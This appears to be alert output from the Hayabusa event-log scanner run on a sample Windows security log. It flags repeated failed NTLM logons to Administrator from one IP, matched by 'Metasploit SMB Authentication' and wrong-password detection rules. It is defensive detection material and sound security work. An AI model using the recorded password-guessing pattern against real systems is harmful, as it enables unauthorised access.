+2016-09-20 01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: d82RRXgSmZdnfa8I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xA3ZWnWc9CoGeKpm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FvSYKi8KvEtnmSbs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IvxXI1u0AwtNHNSU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OFIy6Cps3Rm87Kqf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: slL3aPBnZl3lVJst  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O98P1oP3AU4lZp2D  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EZZ7wIJNZ0CG7fMs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7RhwHCqXQytvcaom  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xumaxbBEMZqL6pPO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ur1yZIwgB3ecNJGw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xAuGcKYRcLe0z3bl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mmMi0edfBJ8KoJst  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hlnoKbUb9jiqJD7t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hBeWGNkWTSp3nje8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2iwM6jPgNjZ3q5qb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xdkrA9Kwzero8eSk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Tb2ZvuJMxOfsxIT6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PBMBRPdATYpLNmyI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: P1CKprAPSw4hgiBB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y8qtzwuGJfQG4XB7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: auOf2GwkoymLh4bC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2YcMYQ4sA2GfMwCS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YL1iM6WUtZIjIoTI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: t7ruxdEGdeP3RLqF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZFXBpUJzafGYIggt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MC1K9nNLupH0NuSS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6rVfBLm10US9II19  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SBhAVHHtR7lZ1C3z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FKuUH8lMELYHibxF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UytgJLBtGRMCf3ar  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Yno9399gUI2oBr4H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dbsqE98qy27Sp0UJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c8RjXtDnXvCXSJ2w  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2EdRXJJ1RCl8n9bd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8tnwGNp2ncfcBlFL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iGKEloPpd6CtrSlg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LBvHz5iKl0dl97xj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: A0FPIXCc5FlKMLaL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c7Li2NqHgSIetZka  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MuIRFiXBUqrJeMbx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zxJNU05FkPwhcYxj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TWifHaaBiypAGkKi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: L9VByeO8vHGSOJK3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ns12T94itDDRxYxC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
